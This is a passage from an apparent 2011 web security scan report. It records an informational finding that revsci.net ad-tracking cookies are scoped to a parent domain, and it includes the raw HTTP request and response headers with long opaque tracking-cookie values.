KSYa1ZGg2oxkSbbaKA1ALrXo0Le6PoDrfzaNtMRXcNvGUtfb8R8zmmC1L04bQNv6/g5b8EfG2xDfv2pVfVOLo6ff/0nSR0l1DtGtv0yyNSdtp1uh6xJ4eJ8pBGmaTMO+t/mPRmN9RQREmOdhsx0zsTxAN9vcsieYqfC/ZpBcc2sOYG1hnnILYTI3wKW0/V4cUDbt6GagbpZv6cD3rFnXObJRXQ7Es13wCofsd754dM3qXNlFSC9ee6PPok4ndQGYxmmoxFc+ARGS1GZ/dkc2xctQvaSv/CvRi4Qt+bmmi+mR81bkRpel83DoRs/5ELDLpRC3zlCFVZ9fZYqH+vm9k/vEW2fNIEyJ2R5aGEHJUfjvGYTWg8nS9ppmlXjNEv8ac9foSe8ZVxuhwRQKPzntFh0n5/dnBitioeRcQeS5qWkLlhCFs1O2rhRzjnJJz+i8NAL/wYWLZU0wEMsz/gFNnfcfBFtVt1XAIfz5XK1d1r9gfAVC08rdymeWF8ZzCitGsS5nw6FYA8FjzIhZlI3gAPupBvDfrlrDt5hiZaPecub/at7V+PzlIBjgA5fRdlwg04RI5GxPrHPNYVfwPvwUR+kcfb5otEILpN0hI738J9IMQVitoW2LAnLCDEM6YDnGOHTvDu1TI7N5KgIkf3itmXOfi9p0nMJtn2WLCO/zEUFowlRDdIH4+1GeH6zx0nyfySJPRE1wAqMQNUzWK4JMunDeNy/xc6jfdcknGS/bJBg9DDgDQ+Zh8ImEEaTAi64LpMauB47hF5XtpnFr4HrjIlBowd3Zp14k/MBFKrQqttAR2anyiuOGFv8LGu1taKado92WukRuSAWw2neiHKwPdxfG0jITETHTJFmQzOUc1iv4Tlh7TpBg40qHwsQTxTvtLohFVW/yCvn8A225IQYTu+O1M8gAQ0ryRVZSjgTPdsGu7XxU+q5Dvkjgci6XfnmIME2+04f6nzGhtpGDVIddPVYoAd8o+YgbMJ96KoonoXqCNOgnTv5QUoSVdMU8/yIkoR8z3e4SCZLVmvGIBtj1IxcB0QRpdRVWJCB8iVLMj/GslP7i/IuygkF+tBEvKDh/lsBHUhb/VBkKgjh4JgGKKNJeukilSnLZ3k1Zt7djl/19oIuSbSEBn+naO5w5Ym8k0L02qGVRS+ErEvc1yGUct+k8Wq9aoP/+MneYgLVVj6MQAEMwjfhZYOgyA7a9NLfk9P4Yf+hYo1D95lCnR22jjV9nx64TzclzupEL4LskhRTAL/iUEb14gttjbvxwO+D/cA0/hmjrlNdc1dtsTzcox5k0pysX4GVTH5LWybuRkMWXKrVBvro6DxST3juwPdYJ8km/Tzgx0ytbhwHh0609yJeds9yt2/QL55qiQrAUo/9pEijNIdJ9nW9avBvKJ5s1Nz1hRK0L3LSY9ttZiKddQ1sEChcUdh/CawI+NJXaHkliroPnVPCxb6lYkgtQNW+VZlL8mB44aVgUgFzZJ/d/Iz4OKu98BrFo35OXlkQDJF2Rq5NQ+dJOHdu75GE2He0G2wtA9Yq05LC+hCnJZmfeyIbXUuAtTrbkfIMwdXBCMOfSqjeISv1uG+Zhi+zcdaOjYrIJMB0hucWT83KDaAGuQkFHWJ2T80zC2+LtpLfv6IimDkq/Gpgc/CpkZXY8yn+SvEQhPjFt1ncahj8pJZBgbYgqmHP3XsfGZxfcmHEHvCTiIy5js2rxOHiGUe4idVEUYt/fJHDCIOvgQMCdKBR6oJbK++XUUWu+EXeHad0VfO7mRpDFNb3fau6ciWxx6+XehQKJHyubd9ZDNXDOaevL43L1iEWvIbsZeA4Rp9HOT74ml9QcT89kpF8YM4H4rwDH4cvaQIdew==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
Set-Cookie: NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a874&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:03:16 GMT; Path=/
X-Proc-ms: 6
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:16 GMT
Content-Length: 930

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['J07717_10702','J07717_10435','J07717_10296','J07717_10134','J07717_10145','J07717_10449','J07717_10555','J07717_10985'];
var rsiExp=new
...[SNIP]...

13.76. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K05539/b3/0/3/1003161/248479722.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5BAFiE2lu64fTXbwk32ILzQmufPZU63k5ONu2v/oPlIcMX/OHb51RFGwBYRw8fBVw0aNn868fOK8Dy9ww0TAIgHMczr3EMFgE8G017VVOyoVGkKxE0WjD8BB8/8jj7sUVGGL6xcF5RPx2WkBN8zk37CtNk/eV2CIxCQ2+JihmeXWoV8B/zkMCkb253a/s9fWcA/Ac3jvLxuOpf0YYQ1ffPryJv8e6p0YW3MPo64WfrrrSXUixD/B8/jeBSwjLhtCVtSnBfdqT1qu883COe0/8WdCdGlIU/ksRDzOZxNnJM9lxwQ9eG+QsGGQjBBEYqh7tKGXRjeSvtm6iX76M18hiqcN77QiO2ORzJDpmafb6GXgJFxs57Blu6FJE7Lxxvz+cR7ly9rR/cBwF2yuXBmEaXk57rx4zwucslSWZbI38ZvvrDPi1yajK5LbOlZKjwlutxiIJ9z8GT/AIqemlToJ0BpKctDBmQ9inrRUNw5FyUG4WiJiREYYVJ2esG6VGdRGE2Ea0U677R9xpsw/NumWG9xFT0kImfMjeKrvtMcWSCCz7ICM9rGdSFf53yFYxdBuB40JKcNZIS42rPWKfbd1iPVGQLrew0hnm6EnL7MGkXyNHK+Lsq3WYjcfe4GRiVvM2dZaP4xyryEJ7l4RxCfzY+x4qm7vuOYXkL3nTFiJfoxFpz0Mtd8FYH9cfOo3PD/Tzs6AFsm7l06fPeimD1JRaMTNnmTaGdCJcZrQDHLfiAp8es3jILvbTkxsAOVy0LGdlYw5mlpUMAElqgKp3SUdFfjXX6mHdqI2Pcnt; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
rtc_IF8h=MLvv+TMxJohmprbr/FOrg2mN7iry9EJR8nXXGp85AnkmlCJ3Dn9/8UQviHrUnHZTstC6vjeHIYOASHlo5yCPSON/Kzv+DA66ZWoDWmvfpTXDttj/l+nlKjcyTGSAoOAUCV576jhKnqvTusSYHas5qXZDkI6xS9wt9LApNogiFtwZ7SpzZMhc7jIXMasR6wtEYgUXUx8MJpjmx/xvfZdXqh3zjf/RrSBzApv/gUzkHzES/IpGTdkJqQGQiF+W3z9F9Rxqsgmkb3o5WC5E7roIcBM+TtpxMvj1qvcu+u/ZVcmg4SqsLEJ0B0KBPUCt3U2HP4oczq8bMwY5uzZFU7Lwq9oHwEAmKvlbxi7sWFx/6SL9iRRb2Dt7Fn0DGLZlLA8gSCfldM4bsJV1HlNvkG6Pt6xK3kTf0bvU6J2fNbpCwrCNbiBuVcriSwtqN2H2BYoZhaJU46bKMHR9q6X71cr7Dl3wqz+rdQn7YomUWFm6uLaTZLuynUKKvr5E3ESnRiRSjJWwGa1PGymnQ7smiHRkrgJ2lxs2USXunhEejw9d/SBKnKCaXybXGm3HgZFD2+JafTAV3XQTwewH9RDAVQ6oDlz+pI9/BVqQBe1ra5BuLADzbrud23T+HFJ3uZRzsKjx8pjhyN8vG+wbpTj9B9LIdYj8u10Fq9SxELvjczDwCb4TW6SeaVbW2eIfElYwVgTmxkbkl59rqDicqUNSqh5U4goElNsz+ILnGcivjCIaEApEUgvR5koxszteVYtlzGRh+tTWp6Q6veEPmlmhGmvUWMKpfxqdAhmsPSjiwhO0Coh+OLN9q4HeGXipUJ+0mKXrWXgR6slQUCcKQrTr1e9hvijz4sj2xN5mhDsGCqF8DTo/Dgv2BjbOU1de3wlIzAn1wsniQU/ghTvQQY+6Rp4+vqTuJN9Whf4GQNsMamhaDatlyWn+vSuGskT8PO0LzQHDU0D+Yt7rpT/CSNusy8FvAIElyCESMQWaE7WuRzEpHspHMogThPEg4fy6KZnz4T7hZ48idKAHSNJiODjSEpU11qbB6VKVGOVvIVuxAKk0fy8ewE25EoGO1Zdd0H/YjRMb8ikhoZ+VQgysPwEndvKP1KRYlTNG/fC8BmwYI5QAikGI5BX7Bu7rAw3k5OJFtg+qz6qGxpF9xqng9FTwlIhIf/XEoPRabDi0X9LzTHuLFDYnKI6giiw+8n1rlmpNkdn//SGjRFpx0M/2xWh72CqM/Z+FZg7h4A7IKb2skR7VDvbGbFesDGJXtqWNCH/f9r7wlBY50bA6rhsvcVHY9e1g4iqN3+8ci0QZjwuWixZVThMOl0bn4LgXSq3M8gCeq52NR5A9jcWCDrf77Zb6n0hArKnQ676Qjir2+YwYGzncffOWxDeHip9MEOOw1kUIg9f870t4uhKGb/XXlGXkfBkEqtflnTGLJs9RgRKbYebjCfR3uRnhkHncREApkZY+TX6kGQjunSa7+Iqen8Kd/RLxGO/qZqd/UT/dLlgL1ikJ4ERkqjCZ0dsE0yMY9AYguNlwffDEHU2EEZDWxCUDja1yId9JnrPHGQnD+KbnQd5FtqURV9ta2inHVxDSfse/jo+nwXftvl+F1j13PNpUPSM2sBRbr1SbxxX1rM1KD1FtdAIVJJwwf3EdBq5YF3IgnlDNfbHJZWpPDhr98emNELqpMihUn67txBKkRvFAhKYxq8qcneVfGelvk1jbIusDcCcbHk4vDpwJlEpBC8yQ46PvKR3SCAD0QRLseNu+7kyXnwpkFbr3zdQlGT4nFNo+jhZLQF0UOoPQmdF+Ur70OoxBtsRnStn8QijXplzYA+62TY0+Ck1L1b9KsS9zBxMZj7GrN4Bj3rx4G3P/eEGKaqOws4a/dIKVV915/hd2cm2lJoeT8Sm+x+1pu2413qTHDtiBpzBb7JHzi70cpWXiWCIfZ7j+aTcn6muisNbIUI19WfOFfQQGwpEAiLMfGGqineuBOOG9FbJcxtrJzQSWMp4/xoy1bsX5t/+OIzCFwc3ZIM9PMORxTfH4TZ3rwPKUIJV4PDKMQkx4yk5mBJMfl7cbniztf70bGzq39fPiP5a+ipVGXgxI+xdgG7Scya+Bxi/cf1R0+V0LY9vPzHZhJFN4fdiPXKQaeQmYg9etY2oNP070WIj/ZCaKwkmNOBQqYmV2AVx1RDKE88Kg7Cry7DV/EFjUbSz75rXMdoEFmV3mUn9fsBB+kEa1j2oWrB8fijw5210ABpzyH3SWymEYRSQpZrH69ptTvNxKpXX9XuMeG4R8o+ZtV3jODgn7hTGlJndQh1xUAmO66keb7AhIl/lsPG4g8NUKol25yvS+qqhKWlgnghY5ZLvLmaQGDOOCekjGo/xljdVQsfbmRkNezRPaddqOV4NmZhxYMJC00V0oKzgSlEd6oBWLbEB5CS8dgQbploZy0vcq/QLlPSEZD+btkxUl0HK/5QMvnA/k2h8UyEbqEORNd3KQbPm3l+3snajYKzbD+PkpjmdpFWFgYvOvnMJfhEfy/gbFmPRzmUpet1Gg9/gCg0o+oB8dfO1vO8hKFOwVxFw0t5RoNMLxO3D3VB+xDtXSMeseQKjFVA9OADcjokWFlb0mqnobmTMihyriwtOoKaMPYeGcdgRNSitNpbyJnUXwcO0pXK2ON2BmQHLhD3OpUxNIhYoL7Wt+vhCNAKN6OXsXd/hHzjxQnCn2yq2LvvrcjWbp4KQH; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4df0b081&1&10592&4dcb7bc9&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:37:37 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K05539/b3/0/3/1003161/248479722.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Fnews%252F2011-05-05%252Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%253FNI%252520TAGS%253DALLTOP%252526SPNATOP%252526SPWWTOP%252526GENTOP%252526USTOP%252526OLYTOP%252526TOP%252526WWTOP%252526%2526_rsiL%253D0%26DM_EOM%3D1&C=K05539 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPKJxL5jdQTtJkLnfaGGH+sXeVhojk3TDdGQ48R7+bLruJ60iM7Sz5oU/MMtfVAK48Z9O6/45hHhobh/P4HBsmPoU0h5SlodRsokYWrKBhXeWhEMhpYHEPoL0KzP3EX6mZFBv9S2dirOe+Qyy4gATViu1piG4YZ7h8IYuIBweBMVCqaoaapFLQFyXwt86CZwNS/ZI2FWdSU9tZKJgdmJaVdwKcPVH+omeRzslVmcpIreii62y4609e4ruTWt7AE2biclRlljz/XkBWKA5jAg4YmqVGcKbaF6Cu6lYgxzS61ATCc+TsSYHbQaQ1b9Bs+h1g+JnvqhPRhpQ9X0T4UILyoAQ6qaTcW0y75ATMgFgVPblB4OEOs+Rn07APBf2ZHZpTJZjCRQRFadCPUUZff9Ww751+pCXbMqzxH3RYaKszrGmw6Bl4Ct/tulPpzHRX4tck+fTAi/ALopOv5wo121Ej5NzCSn35BLQTnG8v/Hkb5rho3dE4bfKB0F8OojW/LLW25gMvqy8pCPUDiUjjwIVd2JfYKiCMGfqd4xuDm3SoXlXWi3Dlgd95+TvfwAHEbVpqzZ2dJOiGbI53uuikyLW71k0ngzB8AZvzytlxan3LWtI9KLsDEIHcprGI0mdY9SUpHT5bxx++8lE5XeRgy9PKl9oYPzV18TxOcagKS3NSOdNBPwaVlx86cak5s8ds1TjvFzExJ467/tlD1ty+ys++umu5ueP6HM12z2u8KSGE9dfflBj7aCHSyO4HcghXXbNjSygKXMBMX0o5gvyaduUNMSFm1YsynfDZLjWdWG6z8xfF9KvtuoIvfyR8ivzFlHL9O/BlcJpaAUdmqA4/keMlEDeuVWtb5stFbBI5DkQgFHhtP2M+g3pxqzPHlouWGOpx2YtocD29it3JFGBItEFfDxTvrDHQvroo0ida71OC1NcxQC9OQy/XOqEJSX8RxfPeouAjoyMqhm9iYIDCK9zu/9sqzwwrgQyOWvphqvVlaowQsS7wrMADeCqdUu6+NVgO9o9XKjPMGkhgPuPIa/yihqHah+SKlO/XvClQX5MMYfZ7FRKgw6q/CP1dHLbkstqhnDmd5GVppLaNZ8l96XbeFJYXTEUzZ7A05Gh0cWCt8hXDSQ6tG2T4FA6XpVxk9n7+CCGxEPjIBFxv6Zxo5lwBeBFo7a4W2T7sLx6MvsoljB9f4Ar+LT5IKhnteI1KOCoUTmoniPnKp7BUuAMUbZ71SX7LSYEEFII4BVWgijlPQbImy3ASlt5J6Guc//o0z9oaUJT/Uh5seuNBfBl06kSXLHwN/KiYSeCNpTNy0V8sIsafkXxKnd3DSC5+SZuwyeo8wN2ZOuOHPrI62KZ7vjIfFSAYKp+cwFzUbH+KvmJ2e7kzJTI1DnL8JUMCe/MMrjdE/2Iyf6TJWMi7AnjiVPx/vbvRAW4RDo3AKJE999kwYcaRciNrO/ANzPdafxGI8WPRFgVCDLgX1vPcai; rsi_segs_1000000=pUPF4jOheXIMH/C100a+jhiBrgB3gbbjanZUIGYQvsJbus0+tNf44z5qNncjloepKzH9jefVjYFD+mT/V/BZW0ePmQC8fee9Ci5xgYQgYvHsE4IHEeAgbZFE1zRWP0qZ+0GzhSbnF7Ghf87lh72NGCQePZ6NXOvHaqOResmRV6gVKFgeZmB4HLRd7Oo3uoR0qc93ZbK0/n2S4I/urBbaQrvJIhKBxmVZgUxkZilQO/7gU0IRvJ226yFLJaG0mQvu68iiB6/zfl+HqjS4iFzRVOLRfFaA11IXW/ngC18rkdPB9AFWQLqt3HsDJb+0pd78ErhUe/bczOV+sa8oNJm0MyiBz9E8b5x4r+aZzxfuQ1sOzg35InohP9lD0Xu8Md1u3ymPGk6bXUrYysHED7eWuB4KJDicWgTeLeAk1hu4u7OLrthqOV2c/JtMcTP8KJv3cIneFx3XcsJqvAv4sJ2XYsc9zYD8nBRhqZxYUKzbIMIykQ+RSFG3dwjjgAzMxo8OQmDf5S33LoUgCyH+8XaqjHG0ZEh0vlu8Aok3RdizoowVEqcKHGsYecVDzQFB9jDqa1ZDI5kjpB1IaHwKfnZxmz0gTyKSgZ8F7m6zxJNB8Ocuu2kqQbolQiY2d9DbulV3rQ3iBxKVCA6jFcJnBsNC1Jx850gnYGRUWDu1l9i5uYumsNua4QDLrq39CbEmQe2PiraUIeqAcxcPR1gDZUJtrZsb98wkbYVWNkRWwNrLFoAM16cFCayjUVdUmlFDIEEiPbYv5wyuZN6UKrw2FL2hpD0NVBpQVdoPnuzCwlt8iWnyKU0=; rtc_8mNC=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